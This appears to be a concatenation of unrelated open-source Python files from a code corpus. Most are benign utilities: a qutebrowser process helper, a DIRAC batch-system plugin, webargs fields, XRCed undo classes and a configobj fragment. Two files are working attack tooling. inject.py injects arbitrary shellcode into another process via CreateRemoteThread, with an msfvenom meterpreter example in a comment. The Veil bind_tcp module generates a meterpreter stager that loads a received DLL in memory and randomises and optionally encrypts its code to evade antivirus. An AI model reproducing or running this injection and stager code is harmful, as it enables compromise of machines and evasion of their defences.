self._pre_start(cmd, args)
ok, _pid = self._proc.startDetached(
cmd, args, None) # type: ignore[call-arg]
if not ok:
message.error("Error while spawning {}".format(self._what))
return False
log.procs.debug("Process started.")
self._started = True
return True
def exit_status(self):
return self._proc.exitStatus()
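# Minimal usage sketch (illustrative; assumes a running Qt event loop and
# that qutebrowser's message/log infrastructure is initialised):
#
#     proc = GUIProcess("editor", verbose=True)
#     proc.start("gedit", ["/tmp/some-file.txt"])
#
# The proxied error/finished/started signals can then be connected like any
# other QProcess signals.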
| forkbong/qutebrowser | qutebrowser/misc/guiprocess.py | Python | gpl-3.0 | 6,787 | 0 |
# First parameter is the path of a binary file containing instructions to be injected
# Second parameter is the Process Identifier (PID) of the process to inject into
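# The raw shellcode file can be produced by any tool that emits raw machine
# code, for example (illustrative, assuming Metasploit is installed):
#   msfvenom -p windows/meterpreter/bind_tcp -f raw -o shellcodefile.bin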
import binascii
import sys
from ctypes import *
if len(sys.argv) < 3:
print("usage inject.py <shellcodefile.bin> <pid>")
sys.exit(1)
file = open(sys.argv[1],'rb')
buff=file.read()
file.close()
print("buffer length = ")
print(len(buff))
print("pid = "+sys.argv[2])
handle = windll.kernel32.OpenProcess(0x1f0fff,0, int(sys.argv[2]))
if (handle == 0):
print("handle == 0")
sys.exit(1)
addr = windll.kernel32.VirtualAllocEx(handle,0,len(buff),0x3000|0x1000,0x40)
if(addr == 0):
print("addr = = 0")
sys.exit(1)
# number of bytes actually written; must be pointer-sized (SIZE_T out-parameter)
bytes_written = c_size_t(0)
windll.kernel32.WriteProcessMemory(handle, addr, buff, len(buff), byref(bytes_written))
handle1 = windll.kernel32.CreateRemoteThread(handle, 0x0, 0x0, addr, 0x0, 0x0, 0x0)
if(handle1 == 0):
print("handle1 = = 0");
sys.exit(1)
windll.kernel32.CloseHandle(handle)
| idkwim/snippets | inject.py | Python | mit | 956 | 0.034519 |
""" The SGE TimeLeft utility interrogates the SGE batch system for the
current CPU consumed, as well as its limit.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
__RCSID__ = "$Id$"
import os
import re
import time
import socket
from DIRAC import S_OK, S_ERROR
from DIRAC.Resources.Computing.BatchSystems.TimeLeft.TimeLeft import runCommand
from DIRAC.Resources.Computing.BatchSystems.TimeLeft.ResourceUsage import ResourceUsage
class SGEResourceUsage(ResourceUsage):
"""
This is the SGE plugin of the TimeLeft Utility
"""
def __init__(self):
"""Standard constructor"""
super(SGEResourceUsage, self).__init__("SGE", "JOB_ID")
self.queue = os.environ.get("QUEUE")
sgePath = os.environ.get("SGE_BINARY_PATH")
if sgePath:
os.environ["PATH"] += ":" + sgePath
self.log.verbose("JOB_ID=%s, QUEUE=%s" % (self.jobID, self.queue))
self.startTime = time.time()
def getResourceUsage(self):
"""Returns S_OK with a dictionary containing the entries CPU, CPULimit,
WallClock, WallClockLimit, and Unit for current slot.
"""
cmd = "qstat -f -j %s" % (self.jobID)
result = runCommand(cmd)
if not result["OK"]:
return result
cpu = None
cpuLimit = None
wallClock = None
wallClockLimit = None
lines = str(result["Value"]).split("\n")
for line in lines:
if re.search("usage.*cpu.*", line):
match = re.search(r"cpu=([\d,:]*),", line)
if match:
cpuList = match.groups()[0].split(":")
try:
newcpu = 0.0
if len(cpuList) == 3:
newcpu = float(cpuList[0]) * 3600 + float(cpuList[1]) * 60 + float(cpuList[2])
elif len(cpuList) == 4:
newcpu = (
float(cpuList[0]) * 24 * 3600
+ float(cpuList[1]) * 3600
+ float(cpuList[2]) * 60
+ float(cpuList[3])
)
if not cpu or newcpu > cpu:
cpu = newcpu
except ValueError:
self.log.warn('Problem parsing "%s" for CPU consumed' % line)
if re.search("hard resource_list.*cpu.*", line):
match = re.search(r"_cpu=(\d*)", line)
if match:
cpuLimit = float(match.groups()[0])
match = re.search(r"_rt=(\d*)", line)
if match:
wallClockLimit = float(match.groups()[0])
else:
self.log.warn("No hard limits found")
# Some SGE batch systems apply CPU scaling factor to the CPU consumption figures
if cpu:
factor = _getCPUScalingFactor()
if factor:
cpu = cpu / factor
consumed = {"CPU": cpu, "CPULimit": cpuLimit, "WallClock": wallClock, "WallClockLimit": wallClockLimit}
if None in consumed.values():
missed = [key for key, val in consumed.items() if val is None]
msg = "Could not determine parameter"
self.log.warn("Could not determine parameter", ",".join(missed))
self.log.debug("This is the stdout from the batch system call\n%s" % (result["Value"]))
else:
self.log.debug("TimeLeft counters complete:", str(consumed))
if cpuLimit or wallClockLimit:
# We have got a partial result from SGE
if not cpuLimit:
# Take some margin
consumed["CPULimit"] = wallClockLimit * 0.8
if not wallClockLimit:
consumed["WallClockLimit"] = cpuLimit / 0.8
if not cpu:
consumed["CPU"] = time.time() - self.startTime
if not wallClock:
consumed["WallClock"] = time.time() - self.startTime
self.log.debug("TimeLeft counters restored:", str(consumed))
return S_OK(consumed)
else:
msg = "Could not determine necessary parameters"
self.log.info(msg, ":\nThis is the stdout from the batch system call\n%s" % (result["Value"]))
retVal = S_ERROR(msg)
retVal["Value"] = consumed
return retVal
def _getCPUScalingFactor():
host = socket.getfqdn()
cmd = "qconf -se %s" % host
result = runCommand(cmd)
if not result["OK"]:
return None
lines = str(result["Value"]).split("\n")
for line in lines:
if re.search("usage_scaling", line):
match = re.search(r"cpu=([\d,\.]*),", line)
if match:
return float(match.groups()[0])
return None
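# For reference, the regexes above match qstat/qconf output lines such as
# (illustrative):
#
#   usage    1:            cpu=01:02:03, mem=..., io=...
#   hard resource_list:    h_cpu=3600,h_rt=7200
#   usage_scaling          cpu=0.900000,mem=1.000000
#
# where "cpu=01:02:03" parses to 1*3600 + 2*60 + 3 = 3723.0 CPU seconds.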
| ic-hep/DIRAC | src/DIRAC/Resources/Computing/BatchSystems/TimeLeft/SGEResourceUsage.py | Python | gpl-3.0 | 4,887 | 0.001432 |
# -*- coding: utf-8 -*-
"""Field classes.
Includes all fields from `marshmallow.fields` in addition to a custom
`Nested` field and `DelimitedList`.
All fields can optionally take a special `location` keyword argument, which tells webargs
where to parse the request argument from. ::
args = {
'active': fields.Bool(location='query')
'content_type': fields.Str(load_from='Content-Type',
location='headers')
}
"""
import marshmallow as ma
from webargs.core import argmap2schema
__all__ = [
'Nested',
'DelimitedList',
]
# Expose all fields from marshmallow.fields.
# We do this instead of 'from marshmallow.fields import *' because webargs
# has its own subclass of Nested
for each in (field_name for field_name in ma.fields.__all__ if field_name != 'Nested'):
__all__.append(each)
globals()[each] = getattr(ma.fields, each)
class Nested(ma.fields.Nested):
"""Same as `marshmallow.fields.Nested`, except can be passed a dictionary as
the first argument, which will be converted to a `marshmallow.Schema`.
"""
def __init__(self, nested, *args, **kwargs):
if isinstance(nested, dict):
nested = argmap2schema(nested)
super(Nested, self).__init__(nested, *args, **kwargs)
class DelimitedList(ma.fields.List):
"""Same as `marshmallow.fields.List`, except can load from either a list or
a delimited string (e.g. "foo,bar,baz").
:param Field cls_or_instance: A field class or instance.
:param str delimiter: Delimiter between values.
:param bool as_string: Dump values to string.
"""
delimiter = ','
def __init__(self, cls_or_instance, delimiter=None, as_string=False, **kwargs):
self.delimiter = delimiter or self.delimiter
self.as_string = as_string
super(DelimitedList, self).__init__(cls_or_instance, **kwargs)
def _serialize(self, value, attr, obj):
ret = super(DelimitedList, self)._serialize(value, attr, obj)
if self.as_string:
return self.delimiter.join(format(each) for each in value)
return ret
def _deserialize(self, value, attr, data):
try:
ret = (
value
if ma.utils.is_iterable_but_not_string(value)
else value.split(self.delimiter)
)
except AttributeError:
self.fail('invalid')
return super(DelimitedList, self)._deserialize(ret, attr, data)
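# Illustrative usage (not part of the original module); a DelimitedList can
# load from either a real list or a delimited string:
#
#     >>> field = DelimitedList(Int())
#     >>> field.deserialize('1,2,3')
#     [1, 2, 3]
#     >>> field.deserialize([4, 5])
#     [4, 5]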
| daspots/dasapp | lib/webargs/fields.py | Python | mit | 2,488 | 0.00201 |
# Name: undo.py
# Purpose: XRC editor, undo/redo module
# Author: Roman Rolinsky <[email protected]>
# Created: 01.12.2002
# RCS-ID: $Id: undo.py 54812 2008-07-29 13:39:00Z ROL $
from globals import *
import view
from component import Manager
from model import Model
undo_depth = 10 # max number of undos remembered
# Undo/redo classes
class UndoManager:
# Undo/redo stacks
undo = []
redo = []
def RegisterUndo(self, undoObj):
TRACE('RegisterUndo: %s', undoObj.label)
self.undo.append(undoObj)
while len(self.undo) > undo_depth: self.undo.pop(0)
map(Undo.destroy, self.redo)
self.redo = []
self.UpdateToolHelp()
def GetUndoLabel(self):
return self.undo[-1].label
def GetRedoLabel(self):
return self.redo[-1].label
def Undo(self):
undoObj = self.undo.pop()
undoObj.undo()
self.redo.append(undoObj)
view.frame.SetStatusText('Undone')
Presenter.setModified()
self.UpdateToolHelp()
def Redo(self):
undoObj = self.redo.pop()
undoObj.redo()
self.undo.append(undoObj)
view.frame.SetStatusText('Redone')
Presenter.setModified()
self.UpdateToolHelp()
def Clear(self):
map(Undo.destroy, self.undo)
self.undo = []
map(Undo.destroy, self.redo)
self.redo = []
self.UpdateToolHelp()
def CanUndo(self):
return bool(self.undo)
def CanRedo(self):
return bool(self.redo)
def UpdateToolHelp(self):
if g.undoMan.CanUndo():
msg = 'Undo ' + self.GetUndoLabel()
view.frame.tb.SetToolShortHelp(wx.ID_UNDO, msg)
view.frame.tb.SetToolLongHelp(wx.ID_UNDO, msg)
if g.undoMan.CanRedo():
msg = 'Redo ' + self.GetRedoLabel()
view.frame.tb.SetToolShortHelp(wx.ID_REDO, msg)
view.frame.tb.SetToolLongHelp(wx.ID_REDO, msg)
class Undo:
'''ABC for Undo*.'''
def redo(self): # usually redo is same as undo
self.undo()
def destroy(self):
pass
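# Typical flow (illustrative): an operation builds an Undo* object and
# registers it, after which the toolbar Undo/Redo actions drive the stacks:
#
#     g.undoMan.RegisterUndo(UndoEdit(item, page))
#     ...
#     if g.undoMan.CanUndo(): g.undoMan.Undo()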
class UndoCutDelete(Undo):
label = 'cut/delete'
def __init__(self, itemIndex, state, node):
self.itemIndex = itemIndex
self.state = state
self.node = node
def destroy(self):
if self.node: self.node.unlink()
self.node = None
def undo(self):
Presenter.unselect()
# Updating DOM. Find parent node first
parentItem = view.tree.ItemAtFullIndex(self.itemIndex[:-1])
parentNode = view.tree.GetPyData(parentItem)
parentComp = Manager.getNodeComp(parentNode)
nextItem = view.tree.ItemAtFullIndex(self.itemIndex)
if nextItem:
nextNode = parentComp.getTreeOrImplicitNode(view.tree.GetPyData(nextItem))
else:
nextNode = None
# Insert before next
parentNode.insertBefore(self.node, nextNode)
# Remember test window item
if view.testWin.item is not None:
testItemIndex = view.tree.ItemFullIndex(view.testWin.item)
# Update tree and presenter
view.tree.FlushSubtree(parentItem, parentNode)
view.tree.SetFullState(self.state)
# Restore test window item
if view.testWin.item is not None:
view.testWin.item = view.tree.ItemAtFullIndex(testItemIndex)
item = view.tree.ItemAtFullIndex(self.itemIndex)
view.tree.EnsureVisible(item)
# This will generate events
view.tree.SelectItem(item)
def redo(self):
item = view.tree.ItemAtFullIndex(self.itemIndex)
Presenter.setData(item)
self.node = Presenter.delete(item)
# Undoing paste/create is the opposite of cut/delete, so we can reuse
# UndoCutDelete class swapping undo<->redo
class UndoPasteCreate(UndoCutDelete):
label = 'paste/create'
# The ctor is different because node is not known initially
def __init__(self, itemIndex, state):
self.itemIndex = itemIndex # new item index
self.state = state # tree state
self.node = None
undo = UndoCutDelete.redo
redo = UndoCutDelete.undo
class UndoReplace(Undo):
label = 'replace'
def __init__(self, itemIndex, comp, node):
self.itemIndex = itemIndex
self.comp = comp
self.node = node
def destroy(self):
if self.node: self.node.unlink()
self.node = None
def undo(self):
# Replace current node with old node
Presenter.unselect()
item = view.tree.ItemAtFullIndex(self.itemIndex)
Presenter.setData(item)
comp = self.comp
node = self.node
data = wx.TreeItemData(node)
parentItem = view.tree.GetItemParent(item)
parentNode = view.tree.GetPyData(parentItem)
self.node = view.tree.GetPyData(item)
self.comp = Presenter.comp
Presenter.container.replaceChild(parentNode, node, self.node)
# Replace tree item: insert new, remove old
label = comp.getTreeText(node)
imageId = comp.getTreeImageId(node)
item = view.tree.InsertItem(parentItem, item, label, imageId, data=data)
view.tree.Delete(view.tree.GetPrevSibling(item))
Presenter.item = item
# Add children
for n in filter(is_object, node.childNodes):
view.tree.AddNode(item, comp.getTreeNode(n))
view.tree.EnsureVisible(item)
# Update panel
view.tree.SelectItem(item)
Presenter.setModified()
class UndoEdit(Undo):
'''Undo class for using in AttributePanel.'''
label = 'edit'
def __init__(self, item, page):
self.index = view.tree.ItemFullIndex(item)
self.page = page
panel = view.panel.nb.GetPage(page).panel
self.values = panel.GetValues()
def undo(self):
# Go back to the previous item
Presenter.unselect()
item = view.tree.ItemAtFullIndex(self.index)
Presenter.setData(item)
panel = view.panel.nb.GetPage(self.page).panel
values = panel.GetValues()
panel.SetValues(self.values)
Presenter.update(item)
self.values = values
view.tree.SelectItem(item)
class UndoGlobal(Undo):
'''Undo class storing a copy of the complete tree. Can be used for
non-frequent operations to avoid programming special undo
classes.'''
label = 'global'
def __init__(self):
self.mainNode = Model.mainNode.cloneNode(True)
self.state = view.tree.GetFullState()
def destroy(self):
self.mainNode.unlink()
def undo(self):
# Exchange
Model.mainNode,self.mainNode = \
self.mainNode,Model.dom.replaceChild(self.mainNode, Model.mainNode)
# Replace testElem
Model.testElem = Model.mainNode.childNodes[0]
state = view.tree.GetFullState()
Presenter.flushSubtree()
view.tree.SetFullState(self.state)
self.state = state
def redo(self):
self.undo()
Presenter.unselect()
| ktan2020/legacy-automation | win/Lib/site-packages/wx-3.0-msw/wx/tools/XRCed/undo.py | Python | mit | 7,307 | 0.005748 |
"""
Custom-written pure python meterpreter/bind_tcp stager
"""
from tools.evasion.evasion_common import evasion_helpers
from tools.evasion.evasion_common import encryption
class PayloadModule:
def __init__(self, cli_obj):
# required options
self.description = "pure windows/meterpreter/bind_tcp stager, no shellcode"
self.rating = "Excellent"
self.name = "Pure Python Reverse TCP stager"
self.path = "python/meterpreter/bind_tcp"
self.cli_opts = cli_obj
self.payload_source_code = ""
self.language = "python"
self.extension = "py"
if cli_obj.ordnance_payload is not None:
self.payload_type = cli_obj.ordnance_payload
elif cli_obj.msfvenom is not None:
self.payload_type = cli_obj.msfvenom
elif not cli_obj.tool:
self.payload_type = ""
# optional
        # options we require user interaction for - format is {OPTION : [Value, Description]}
self.required_options = {
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"RHOST" : ["", "The listen target address"],
"LPORT" : ["4444", "The listen port"],
"USE_PYHERION" : ["N", "Use the pyherion encrypter"]}
def generate(self):
# randomize all of the variable names used
shellCodeName = evasion_helpers.randomString()
socketName = evasion_helpers.randomString()
clientSocketName = evasion_helpers.randomString()
getDataMethodName = evasion_helpers.randomString()
fdBufName = evasion_helpers.randomString()
rcvStringName = evasion_helpers.randomString()
rcvCStringName = evasion_helpers.randomString()
injectMethodName = evasion_helpers.randomString()
tempShellcodeName = evasion_helpers.randomString()
shellcodeBufName = evasion_helpers.randomString()
fpName = evasion_helpers.randomString()
tempCBuffer = evasion_helpers.randomString()
payload_code = "import struct, socket, binascii, ctypes, random, time\n"
# socket and shellcode variables that need to be kept global
payload_code += "%s, %s = None, None\n" % (shellCodeName,socketName)
# build the method that creates a socket, connects to the handler,
# and downloads/patches the meterpreter .dll
payload_code += "def %s():\n" %(getDataMethodName)
payload_code += "\ttry:\n"
payload_code += "\t\tglobal %s\n" %(socketName)
payload_code += "\t\tglobal %s\n" %(clientSocketName)
# build the socket and connect to the handler
payload_code += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName)
payload_code += "\t\t%s.bind(('%s', %s))\n" %(socketName,self.required_options["RHOST"][0], str(self.required_options["LPORT"][0]))
payload_code += "\t\t%s.listen(1)\n" % (socketName)
payload_code += "\t\t%s,_ = %s.accept()\n" % (clientSocketName, socketName)
# pack the underlying socket file descriptor into a c structure
payload_code += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,clientSocketName)
# unpack the length of the payload, received as a 4 byte array from the handler
payload_code += "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" %(clientSocketName)
payload_code += "\t\t" + rcvStringName + " = b\" \"\n"
# receive ALL of the payload .dll data
payload_code += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, clientSocketName)
payload_code += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (rcvCStringName,rcvStringName,rcvStringName)
# prepend a little assembly magic to push the socket fd into the edi register
payload_code += "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName)
# copy the socket fd in
payload_code += "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName)
payload_code += "\t\treturn %s\n" % (rcvCStringName)
payload_code += "\texcept: return None\n"
# build the method that injects the .dll into memory
payload_code += "def %s(%s):\n" %(injectMethodName,tempShellcodeName)
payload_code += "\tif %s != None:\n" %(tempShellcodeName)
payload_code += "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName)
# allocate enough virtual memory to stuff the .dll in
payload_code += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(fpName,shellcodeBufName)
# virtual lock to prevent the memory from paging out to disk
payload_code += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" %(fpName,shellcodeBufName)
payload_code += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(tempCBuffer,shellcodeBufName,shellcodeBufName)
# copy the .dll into the allocated memory
payload_code += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" %(fpName,tempCBuffer,shellcodeBufName)
# kick the thread off to execute the .dll
payload_code += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(fpName)
# wait for the .dll execution to finish
payload_code += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n"
# download the stager
payload_code += "%s = %s()\n" %(shellCodeName, getDataMethodName)
# inject what we grabbed
payload_code += "%s(%s)\n" % (injectMethodName,shellCodeName)
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
| Veil-Framework/Veil | tools/evasion/payloads/python/meterpreter/bind_tcp.py | Python | gpl-3.0 | 6,026 | 0.009459 |
#!/usr/bin/env python3
import os
import sys
import re
import tempfile
from subprocess import run
from shutil import copyfile
args = sys.argv[1:]
in_dir = args[0] if len(args) == 1 else os.getcwd()
if not os.path.isabs(in_dir):
in_dir = os.path.abspath(in_dir)
if not os.path.isdir(in_dir):
print('"{}" is not a directory'.format(in_dir))
sys.exit(1)
work_dir = os.environ['WORK']
app_dir = re.sub(work_dir, '', in_dir)
if app_dir.startswith('/'):
app_dir = app_dir[1:]
app_base = os.path.split(app_dir)[0]
print('Looking in "{}"'.format(in_dir))
manifests = []
for root, _, filenames in os.walk(in_dir):
for filename in filenames:
if filename == 'MANIFEST':
manifests.append(os.path.join(root, filename))
num = len(manifests)
print('Found {} MANIFEST file{} in "{}"'.format(num, '' if num == 1 else 's', in_dir))
if num == 0:
sys.exit(1)
file_num = 0
tmp_dir = os.path.join(tempfile.mkdtemp(), app_dir)
if not os.path.isdir(tmp_dir):
os.makedirs(tmp_dir)
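# Each MANIFEST is expected to list one path per line, relative to the
# directory that contains it, e.g. (illustrative contents):
#
#   ./scripts/run.sh
#   ./data/input.txt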
for manifest in manifests:
man_dir = os.path.dirname(manifest)
print('Processing {}'.format(manifest))
for file in open(manifest):
file = file.rstrip()
        path = re.sub(r'^\.', man_dir, file)
file_num += 1
print('{:3}: {}'.format(file_num, path))
if os.path.isfile(path):
filedir = os.path.dirname(re.sub(in_dir, '', path))
if filedir.startswith('/'):
filedir = filedir[1:]
partial = os.path.join(tmp_dir, filedir)
if not os.path.isdir(partial):
os.makedirs(partial)
copyfile(path, os.path.join(partial, os.path.basename(file)))
dest = 'kyclark/applications/' + app_base
upload = '/home1/03137/kyclark/cyverse-cli/bin/files-upload'
run([upload, '-F', tmp_dir, dest])
print('Done, check "{}"'.format(dest))
| kyclark/misc | tacc_manifest_upload/copy_from_manifest.py | Python | mit | 1,866 | 0.001608 |
# configobj.py
# A config file reader/writer that supports nested sections in config files.
# Copyright (C) 2005-2014:
# (name) : (email)
# Michael Foord: fuzzyman AT voidspace DOT org DOT uk
# Nicola Larosa: nico AT tekNico DOT net
# Rob Dennis: rdennis AT gmail DOT com
# Eli Courtwright: eli AT courtwright DOT org
# This software is licensed under the terms of the BSD license.
# http://opensource.org/licenses/BSD-3-Clause
# ConfigObj 5 - main repository for documentation and issue tracking:
# https://github.com/DiffSK/configobj
import os
import re
import sys
from codecs import BOM_UTF8, BOM_UTF16, BOM_UTF16_BE, BOM_UTF16_LE
from lib.six import six
from _version import __version__
# imported lazily to avoid startup performance hit if it isn't used
compiler = None
# A dictionary mapping BOM to
# the encoding to decode with, and what to set the
# encoding attribute to.
BOMS = {
BOM_UTF8: ('utf_8', None),
BOM_UTF16_BE: ('utf16_be', 'utf_16'),
BOM_UTF16_LE: ('utf16_le', 'utf_16'),
BOM_UTF16: ('utf_16', 'utf_16'),
}
# All legal variants of the BOM codecs.
# TODO: the list of aliases is not meant to be exhaustive, is there a
# better way ?
BOM_LIST = {
'utf_16': 'utf_16',
'u16': 'utf_16',
'utf16': 'utf_16',
'utf-16': 'utf_16',
'utf16_be': 'utf16_be',
'utf_16_be': 'utf16_be',
'utf-16be': 'utf16_be',
'utf16_le': 'utf16_le',
'utf_16_le': 'utf16_le',
'utf-16le': 'utf16_le',
'utf_8': 'utf_8',
'u8': 'utf_8',
'utf': 'utf_8',
'utf8': 'utf_8',
'utf-8': 'utf_8',
}
# Map of encodings to the BOM to write.
BOM_SET = {
'utf_8': BOM_UTF8,
'utf_16': BOM_UTF16,
'utf16_be': BOM_UTF16_BE,
'utf16_le': BOM_UTF16_LE,
None: BOM_UTF8
}
def match_utf8(encoding):
return BOM_LIST.get(encoding.lower()) == 'utf_8'
# Quote strings used for writing values
squot = "'%s'"
dquot = '"%s"'
noquot = "%s"
wspace_plus = ' \r\n\v\t\'"'
tsquot = '"""%s"""'
tdquot = "'''%s'''"
# Sentinel for use in getattr calls to replace hasattr
MISSING = object()
__all__ = (
'DEFAULT_INDENT_TYPE',
'DEFAULT_INTERPOLATION',
'ConfigObjError',
'NestingError',
'ParseError',
'DuplicateError',
'ConfigspecError',
'ConfigObj',
'SimpleVal',
'InterpolationError',
'InterpolationLoopError',
'MissingInterpolationOption',
'RepeatSectionError',
'ReloadError',
'UnreprError',
'UnknownType',
'flatten_errors',
'get_extra_values'
)
DEFAULT_INTERPOLATION = 'configparser'
DEFAULT_INDENT_TYPE = ' '
MAX_INTERPOL_DEPTH = 10
OPTION_DEFAULTS = {
'interpolation': True,
'raise_errors': False,
'list_values': True,
'create_empty': False,
'file_error': False,
'configspec': None,
'stringify': True,
# option may be set to one of ('', ' ', '\t')
'indent_type': None,
'encoding': None,
'default_encoding': None,
'unrepr': False,
'write_empty_values': False,
}
# this could be replaced if six is used for compatibility, or there are no
# more assertions about items being a string
def getObj(s):
global compiler
if compiler is None:
import compiler
s = "a=" + s
p = compiler.parse(s)
return p.getChildren()[1].getChildren()[0].getChildren()[1]
class UnknownType(Exception):
pass
class Builder(object):
    def build(self, o):
        m = getattr(self, 'build_' + o.__class__.__name__, None)
        if m is None:
            raise UnknownType(o.__class__.__name__)
        return m(o)
def build_List(self, o):
return list(map(self.build, o.getChildren()))
def build_Const(self, o):
return o.value
def build_Dict(self, o):
d = {}
i = iter(map(self.build, o.getChildren()))
for el in i:
d[el] = next(i)
return d
def build_Tuple(self, o):
return tuple(self.build_List(o))
def build_Name(self, o):
if o.name == 'None':
return None
if o.name == 'True':
return True
if o.name == 'False':
return False
# An undefined Name
raise UnknownType('Undefined Name')
def build_Add(self, o):
real, imag = list(map(self.build_Const, o.getChildren()))
try:
real = float(real)
except TypeError:
raise UnknownType('Add')
if not isinstance(imag, complex) or imag.real != 0.0:
raise UnknownType('Add')
return real+imag
def build_Getattr(self, o):
parent = self.build(o.expr)
return getattr(parent, o.attrname)
def build_UnarySub(self, o):
return -self.build_Const(o.getChildren()[0])
def build_UnaryAdd(self, o):
return self.build_Const(o.getChildren()[0])
_builder = Builder()
def unrepr(s):
if not s:
return s
# this is supposed to be safe
import ast
return ast.literal_eval(s)
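# Illustrative behaviour of unrepr() (doctest-style):
#
#     >>> unrepr("['a', 1, {'b': True}]")
#     ['a', 1, {'b': True}]
#     >>> unrepr("")
#     ''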
class ConfigObjError(SyntaxError):
"""
This is the base class for all errors that ConfigObj raises.
It is a subclass of SyntaxError.
"""
def __init__(self, message='', line_number=None, line=''):
self.line = line
self.line_number = line_number
SyntaxError.__init__(self, message)
class NestingError(ConfigObjError):
"""
This error indicates a level of nesting that doesn't match.
"""
class ParseError(ConfigObjError):
"""
This error indicates that a line is badly written.
It is neither a valid ``key = value`` line,
nor a valid section marker line.
"""
class ReloadError(IOError):
"""
A 'reload' operation failed.
This exception is a subclass of ``IOError``.
"""
def __init__(self):
IOError.__init__(self, 'reload failed, filename is not set.')
class DuplicateError(ConfigObjError):
"""
The keyword or section specified already exists.
"""
class ConfigspecError(ConfigObjError):
"""
An error occured whilst parsing a configspec.
"""
class InterpolationError(ConfigObjError):
"""Base class for the two interpolation errors."""
class InterpolationLoopError(InterpolationError):
"""Maximum interpolation depth exceeded in string interpolation."""
def __init__(self, option):
InterpolationError.__init__(
self,
'interpolation loop detected in value "%s".' % option)
class RepeatSectionError(ConfigObjError):
"""
This error indicates additional sections in a section with a
``__many__`` (repeated) section.
"""
class MissingInterpolationOption(InterpolationError):
"""A value specified for interpolation was missing."""
def __init__(self, option):
msg = 'missing option "%s" in interpolation.' % option
InterpolationError.__init__(self, msg)
class UnreprError(ConfigObjError):
"""An error parsing in unrepr mode."""
class InterpolationEngine(object):
"""
A helper class to help perform string interpolation.
This class is an abstract base class; its descendants perform
the actual work.
"""
# compiled regexp to use in self.interpolate()
_KEYCRE = re.compile(r"%\(([^)]*)\)s")
_cookie = '%'
def __init__(self, section):
# the Section instance that "owns" this engine
self.section = section
def interpolate(self, key, value):
# short-cut
if not self._cookie in value:
return value
def recursive_interpolate(key, value, section, backtrail):
"""The function that does the actual work.
``value``: the string we're trying to interpolate.
``section``: the section in which that string was found
``backtrail``: a dict to keep track of where we've been,
to detect and prevent infinite recursion loops
This is similar to a depth-first-search algorithm.
"""
# Have we been here already?
if (key, section.name) in backtrail:
# Yes - infinite loop detected
raise InterpolationLoopError(key)
# Place a marker on our backtrail so we won't come back here again
backtrail[(key, section.name)] = 1
# Now start the actual work
match = self._KEYCRE.search(value)
while match:
# The actual parsing of the match is implementation-dependent,
# so delegate to our helper function
k, v, s = self._parse_match(match)
if k is None:
# That's the signal that no further interpolation is needed
replacement = v
else:
# Further interpolation may be needed to obtain final value
replacement = recursive_interpolate(k, v, s, backtrail)
# Replace the matched string with its final value
start, end = match.span()
value = ''.join((value[:start], replacement, value[end:]))
new_search_start = start + len(replacement)
# Pick up the next interpolation key, if any, for next time
# through the while loop
match = self._KEYCRE.search(value, new_search_start)
# Now safe to come back here again; remove marker from backtrail
del backtrail[(key, section.name)]
return value
# Back in interpolate(), all we have to do is kick off the recursive
# function with appropriate starting values
value = recursive_interpolate(key, value, self.section, {})
return value
def _fetch(self, key):
"""Helper function to fetch values from owning section.
Returns a 2-tuple: the value, and the section where it was found.
"""
# switch off interpolation before we try and fetch anything !
save_interp = self.section.main.interpolation
self.section.main.interpolation = False
# Start at section that "owns" this InterpolationEngine
current_section = self.section
while True:
# try the current section first
val = current_section.get(key)
if val is not None and not isinstance(val, Section):
break
# try "DEFAULT" next
val = current_section.get('DEFAULT', {}).get(key)
if val is not None and not isinstance(val, Section):
break
# move up to parent and try again
# top-level's parent is itself
if current_section.parent is current_section:
# reached top level, time to give up
break
current_section = current_section.parent
# restore interpolation to previous value before returning
self.section.main.interpolation = save_interp
if val is None:
raise MissingInterpolationOption(key)
return val, current_section
def _parse_match(self, match):
"""Implementation-dependent helper function.
Will be passed a match object corresponding to the interpolation
key we just found (e.g., "%(foo)s" or "$foo"). Should look up that
key in the appropriate config file section (using the ``_fetch()``
helper function) and return a 3-tuple: (key, value, section)
``key`` is the name of the key we're looking for
``value`` is the value found for that key
``section`` is a reference to the section where it was found
``key`` and ``section`` should be None if no further
interpolation should be performed on the resulting value
(e.g., if we interpolated "$$" and returned "$").
"""
raise NotImplementedError()
class ConfigParserInterpolation(InterpolationEngine):
"""Behaves like ConfigParser."""
_cookie = '%'
_KEYCRE = re.compile(r"%\(([^)]*)\)s")
def _parse_match(self, match):
key = match.group(1)
value, section = self._fetch(key)
return key, value, section
class TemplateInterpolation(InterpolationEngine):
"""Behaves like string.Template."""
_cookie = '$'
_delimiter = '$'
_KEYCRE = re.compile(r"""
\$(?:
(?P<escaped>\$) | # Two $ signs
(?P<named>[_a-z][_a-z0-9]*) | # $name format
{(?P<braced>[^}]*)} # ${name} format
)
""", re.IGNORECASE | re.VERBOSE)
def _parse_match(self, match):
# Valid name (in or out of braces): fetch value from section
key = match.group('named') or match.group('braced')
if key is not None:
value, section = self._fetch(key)
return key, value, section
# Escaped delimiter (e.g., $$): return single delimiter
if match.group('escaped') is not None:
# Return None for key and section to indicate it's time to stop
return None, self._delimiter, None
